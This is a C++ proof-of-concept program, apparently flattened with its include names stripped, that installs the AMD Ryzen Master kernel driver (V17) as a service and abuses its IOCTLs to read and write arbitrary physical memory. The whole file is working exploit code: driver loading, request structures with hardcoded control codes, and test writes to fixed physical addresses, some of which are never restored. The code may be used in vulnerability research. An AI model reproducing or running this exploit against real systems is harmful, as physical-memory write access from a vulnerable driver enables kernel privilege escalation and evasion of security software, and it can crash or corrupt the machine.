#include #include #include #include #include #include #define DEVICE_NAME L"\\\\.\\AMDRyzenMasterDriverV17" #define DRIVER_NAME L"AMDRyzenMasterDriverV17" #define DRIVER_PATH L"\\AMDRyzenMasterDriverV17.sys" #define PHYS_READ 0x81112F08 #define PHYS_WRITE 0x81112F0C #pragma pack(push, 1) typedef struct _AMDReadStructure { LARGE_INTEGER PhysAddr; LARGE_INTEGER SizeAndData; CHAR Buffer[1]; } AMDReadStructure, *PAMDReadStructure; typedef struct _AMDWriteStructure { LARGE_INTEGER PhysAddr; LARGE_INTEGER SizeAndData; CHAR Buffer[1]; } AMDWriteStructure, *PAMDWriteStructure; #pragma pack(pop) class MemoryTester { private: HANDLE hDevice; public: MemoryTester() : hDevice(INVALID_HANDLE_VALUE) {} BOOL Initialize() { hDevice = CreateFileW( DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); return hDevice != INVALID_HANDLE_VALUE; } BOOL ReadPhysicalMemory(ULONG64 PhysicalAddress, void* Buffer, ULONG Size) { DWORD bytesReturned = 0; size_t DataSize = Size; size_t TotalSize = sizeof(AMDReadStructure) + DataSize - 1; size_t InputSize = std::max(TotalSize, size_t(0xC)); size_t OutputSize = std::max(TotalSize + DataSize, size_t(0xC + DataSize)); std::unique_ptr InputBuffer(new BYTE[InputSize]); std::unique_ptr OutputBuffer(new BYTE[OutputSize]); ZeroMemory(InputBuffer.get(), InputSize); ZeroMemory(OutputBuffer.get(), OutputSize); PAMDReadStructure Request = reinterpret_cast(InputBuffer.get()); PAMDReadStructure Response = reinterpret_cast(OutputBuffer.get()); Request->PhysAddr.QuadPart = PhysicalAddress; Request->SizeAndData.LowPart = (ULONG)DataSize; Request->SizeAndData.HighPart = 0; printf("[*] Reading %d bytes from physical address 0x%llX\n", Size, PhysicalAddress); BOOL Success = DeviceIoControl( hDevice, PHYS_READ, Request, (DWORD)InputSize, Response, (DWORD)OutputSize, &bytesReturned, NULL ); if (Success && bytesReturned > 0) { BYTE* DataPtr = reinterpret_cast(&Response->SizeAndData.QuadPart) + 4; memcpy(Buffer, DataPtr, Size); printf(" PHYSICAL MEMORY READ SUCCESS!\n"); printf(" Read %d bytes from 0x%llX\n", Size, PhysicalAddress); printf(" Data: "); for (ULONG i = 0; i < (Size > 16 ? 16 : Size); i++) { printf("%02X ", ((PUCHAR)Buffer)[i]); } printf("\n"); return TRUE; } else { DWORD Error = GetLastError(); printf("PHYSICAL MEMORY READ FAILED: %d\n", Error); return FALSE; } } BOOL WritePhysicalMemory(ULONG64 PhysicalAddress, const void* Data, ULONG Size) { DWORD bytesReturned = 0; size_t DataSize = Size; size_t TotalSize = sizeof(AMDWriteStructure) + DataSize - 1; size_t RequiredSize = DataSize + 12; size_t InputSize = std::max(TotalSize, RequiredSize); std::unique_ptr InputBuffer(new BYTE[InputSize]); ZeroMemory(InputBuffer.get(), InputSize); PAMDWriteStructure Request = reinterpret_cast(InputBuffer.get()); Request->PhysAddr.QuadPart = PhysicalAddress; Request->SizeAndData.LowPart = (ULONG)DataSize; Request->SizeAndData.HighPart = 0; BYTE* DataPtr = reinterpret_cast(&Request->SizeAndData.QuadPart) + 4; memcpy(DataPtr, Data, DataSize); printf("[*] Writing %d bytes to physical address 0x%llX\n", Size, PhysicalAddress); printf(" Data: "); for (ULONG i = 0; i < (Size > 8 ? 8 : Size); i++) { printf("%02X ", ((PUCHAR)Data)[i]); } printf("\n"); BOOL Success = DeviceIoControl( hDevice, PHYS_WRITE, Request, (DWORD)InputSize, NULL, 0, &bytesReturned, NULL ); if (Success) { printf(" PHYSICAL MEMORY WRITE SUCCESS!\n"); printf(" Wrote %d bytes to 0x%llX\n", Size, PhysicalAddress); return TRUE; } else { DWORD Error = GetLastError(); printf("PHYSICAL MEMORY WRITE FAILED: %d", Error); switch (Error) { case 1: printf(" (ERROR_INVALID_FUNCTION)\n"); break; case 5: printf(" (ERROR_ACCESS_DENIED)\n"); break; case 6: printf(" (ERROR_INVALID_HANDLE)\n"); break; case 50: printf(" (ERROR_NOT_SUPPORTED)\n"); break; case 87: printf(" (ERROR_INVALID_PARAMETER)\n"); break; case 1784: printf(" (ERROR_INVALID_USER_BUFFER)\n"); break; default: printf("\n"); break; } return FALSE; } } void TestReadWriteVerify() { printf("\n[!] TESTING READ/WRITE/VERIFY SEQUENCE\n"); ULONG64 testAddress = 0x100000; UCHAR originalData[8] = {0}; UCHAR testData[] = {0xDE, 0xAD, 0xBE, 0xEF, 0xCA, 0xFE, 0xBA, 0xBE}; UCHAR verifyData[8] = {0}; printf("\n[STEP 1] Reading original data...\n"); if (!ReadPhysicalMemory(testAddress, originalData, sizeof(originalData))) { printf("[-] Failed to read original data\n"); return; } printf("\n[STEP 2] Writing test data...\n"); if (!WritePhysicalMemory(testAddress, testData, sizeof(testData))) { printf("[-] Failed to write test data\n"); return; } printf("\n[STEP 3] Verifying written data...\n"); if (!ReadPhysicalMemory(testAddress, verifyData, sizeof(verifyData))) { printf("[-] Failed to verify data\n"); return; } if (memcmp(testData, verifyData, sizeof(testData)) == 0) { printf("DATA VERIFICATION SUCCESS! Write/Read works correctly!\n"); } else { printf("DATA VERIFICATION FAILED! Data corruption or driver issue!\n"); printf(" Expected: "); for (int i = 0; i < 8; i++) printf("%02X ", testData[i]); printf("\n Got: "); for (int i = 0; i < 8; i++) printf("%02X ", verifyData[i]); printf("\n"); } printf("\n[STEP 4] Restoring original data...\n"); WritePhysicalMemory(testAddress, originalData, sizeof(originalData)); } void TestVariousSizes() { printf("\n[!] TESTING VARIOUS DATA SIZES\n"); ULONG64 baseAddress = 0x200000; ULONG testSizes[] = {1, 2, 4, 8, 16, 32, 64}; for (int i = 0; i < sizeof(testSizes)/sizeof(testSizes[0]); i++) { ULONG size = testSizes[i]; printf("\n[SIZE TEST] Testing %d bytes\n", size); std::unique_ptr testData(new UCHAR[size]); for (ULONG j = 0; j < size; j++) { testData[j] = (UCHAR)(0x41 + j); } if (WritePhysicalMemory(baseAddress + (i * 0x1000), testData.get(), size)) { printf("[+] Write succeeded for %d bytes\n", size); std::unique_ptr readData(new UCHAR[size]); if (ReadPhysicalMemory(baseAddress + (i * 0x1000), readData.get(), size)) { if (memcmp(testData.get(), readData.get(), size) == 0) { printf("[+] Read verification succeeded for %d bytes\n", size); } else { printf("[-] Read verification failed for %d bytes\n", size); } } } else { printf("[-] Write failed for %d bytes\n", size); } } } ~MemoryTester() { if (hDevice != INVALID_HANDLE_VALUE) { CloseHandle(hDevice); } } }; bool InstallDriverService() { wchar_t szExePath[MAX_PATH] = { 0 }; if (!GetModuleFileNameW(NULL, szExePath, MAX_PATH)) { printf("[-] GetModuleFileName failed: %d\n", GetLastError()); return false; } wchar_t szDirPath[MAX_PATH] = { 0 }; wcscpy_s(szDirPath, MAX_PATH, szExePath); wchar_t* pLastBackslash = wcsrchr(szDirPath, L'\\'); if (pLastBackslash) { *pLastBackslash = L'\0'; } wchar_t szDriverPath[MAX_PATH] = { 0 }; swprintf_s(szDriverPath, MAX_PATH, L"%s%s", szDirPath, DRIVER_PATH); printf("[*] Driver path: %ls\n", szDriverPath); if (!std::filesystem::exists(szDriverPath)) { printf("[-] Driver file not found at: %ls\n", szDriverPath); return false; } printf("[+] Driver file found\n"); SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CREATE_SERVICE); if (schSCManager == NULL) { printf("[-] OpenSCManager failed: %d\n", GetLastError()); return false; } SC_HANDLE schService = CreateServiceW( schSCManager, DRIVER_NAME, DRIVER_NAME, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, szDriverPath, NULL, NULL, NULL, NULL, NULL ); if (schService == NULL) { DWORD err = GetLastError(); if (err != ERROR_SERVICE_EXISTS) { printf("[-] CreateService failed: %d\n", err); CloseServiceHandle(schSCManager); return false; } printf("[*] Service already exists\n"); } else { printf("[+] Service created successfully\n"); CloseServiceHandle(schService); } schService = OpenServiceW(schSCManager, DRIVER_NAME, SERVICE_START | SERVICE_STOP); if (schService == NULL) { printf("[-] OpenService failed: %d\n", GetLastError()); CloseServiceHandle(schSCManager); return false; } if (!StartServiceW(schService, 0, NULL)) { DWORD err = GetLastError(); if (err != ERROR_SERVICE_ALREADY_RUNNING) { printf("[-] StartService failed: %d\n", err); CloseServiceHandle(schService); CloseServiceHandle(schSCManager); return false; } printf("[*] Service already running\n"); } else { printf("[+] Service started successfully\n"); } CloseServiceHandle(schService); CloseServiceHandle(schSCManager); return true; } bool StopAndRemoveDriverService() { SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT); if (schSCManager == NULL) { printf("[-] OpenSCManager failed: %d\n", GetLastError()); return false; } SC_HANDLE schService = OpenServiceW(schSCManager, DRIVER_NAME, SERVICE_STOP | DELETE); if (schService == NULL) { DWORD err = GetLastError(); if (err == ERROR_SERVICE_DOES_NOT_EXIST) { printf("[*] Service does not exist\n"); CloseServiceHandle(schSCManager); return true; } printf("[-] OpenService failed: %d\n", err); CloseServiceHandle(schSCManager); return false; } SERVICE_STATUS serviceStatus; if (!ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus)) { DWORD err = GetLastError(); if (err != ERROR_SERVICE_NOT_ACTIVE) { printf("[-] ControlService(STOP) failed: %d\n", err); } } else { printf("[+] Service stopped\n"); } if (!DeleteService(schService)) { printf("[-] DeleteService failed: %d\n", GetLastError()); CloseServiceHandle(schService); CloseServiceHandle(schSCManager); return false; } printf("[+] Service deleted\n"); CloseServiceHandle(schService); CloseServiceHandle(schSCManager); return true; } int main(int argc, char* argv[]) { printf("===========================================\n"); printf(" AMD Ryzen Master Driver - Memory POC \n"); printf("===========================================\n\n"); if (argc > 1 && std::string(argv[1]) == "remove") { printf("[*] Removing driver service...\n"); StopAndRemoveDriverService(); return 0; } printf("[*] Installing and starting driver service...\n"); if (!InstallDriverService()) { printf("[-] Failed to install/start driver service\n"); printf("[!] Make sure you're running as Administrator and the .sys file exists\n"); return 1; } printf("\n[*] Initializing driver connection...\n"); MemoryTester tester; if (!tester.Initialize()) { printf("[!] Failed to open device: %d\n", GetLastError()); printf("[!] Make sure the driver is loaded and device is accessible\n"); return 1; } printf("[+] Driver connection established successfully\n"); printf("\n==================================================\n"); printf(" STARTING PHYSICAL MEMORY TESTS\n"); printf("==================================================\n"); tester.TestReadWriteVerify(); tester.TestVariousSizes(); printf("\n==================================================\n"); printf(" ALL TESTS COMPLETED\n"); printf("==================================================\n"); printf("[!] If you see SUCCESS messages above, the driver has physical memory access!\n"); printf("[!] Use 'poc_demo.exe remove' to uninstall the driver\n\n"); system("pause"); return 0; }